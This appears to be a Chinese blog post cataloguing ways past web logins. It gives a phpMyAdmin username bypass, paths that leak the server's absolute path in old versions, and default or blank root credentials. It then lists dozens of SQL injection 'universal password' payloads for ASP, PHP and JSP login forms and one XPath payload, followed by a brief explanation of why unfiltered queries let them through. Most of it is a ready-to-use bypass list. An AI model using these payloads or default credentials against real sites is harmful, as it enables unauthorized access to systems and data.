php弱口令总结,web漏洞之弱口令

前言:将web漏洞中万能密码也归类于弱口令篇。

1.phpmyadmin

phpmyadmin万能密码

其实应该叫phpmyadmin万能账号,因为是在帐号处输入漏洞信息,而密码不需要输入

用户名处写入'localhost'@'@"则登录成功,密码无需输入 (全部为英文标点符号)

c4626749fe0b

phpmyadmin 爆绝对路径

phpMyAdmin/libraries/select_lang.lib.php

phpMyAdmin/darkblue_orange/layout.inc.php

phpMyAdmin/index.php?lang[]=1

phpmyadmin/themes/darkblue_orange/layout.inc.php

漏洞影响版本  2.11.4 , 2.11.3

phpmyadmin弱口令

phpMyAdmin默认账号密码

用户名 root

密码  root

或空登陆。

phpmyadmin root空密码

用户名 root 登陆,无需密码。

漏洞影响版本 2.11.9.2

2.web后台站万能密码admin'or'1'='1

'UNION SELECT 1, 'anotheruser', 'doesnt matter', 1–

"or"a"="a

'xor

'or'='or'

(asp、aspx的万能密码)

1:"or "a"="a

2:')or('a'='a

3:'or'='or'

4:'or 1=1–

5:a'or' 1=1–

6:"or 1=1–

7:'or'a'='a

8:"or"="a'='a

9:'or"='

10:admin'or'1=1

11:1 or '1'='1'=1

12:1 or '1'='1' or 1=1

13:'OR 1=1%00

14:'or 1=1%00

15:'xor

'or'='or'

(PHP的万能密码)

or 1=1/*

User:something

Pass:OR 1=1

(jsp的万能密码)

1or1=1

admin OR 1=1/*

xpath注入万能密码

"or 1=1 or "='

万能密码原理:

由于一些网站后台输入账号密码未进行字符过滤导致sql注入万能密码

如下为 登陆源码语句select * from user where username='$user' and password ='$pass'

输入万能密码  'or'1'='1select * from user where username=''or '1'='1' and password ='' or'1'='1'

可以看到 or 直接绕过,使得判断逻辑语句一直为真,对于一些代码可以进行绕过万能密码进入后台,这样SQL返回的值始终为1,就成功绕过了程序的验证。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值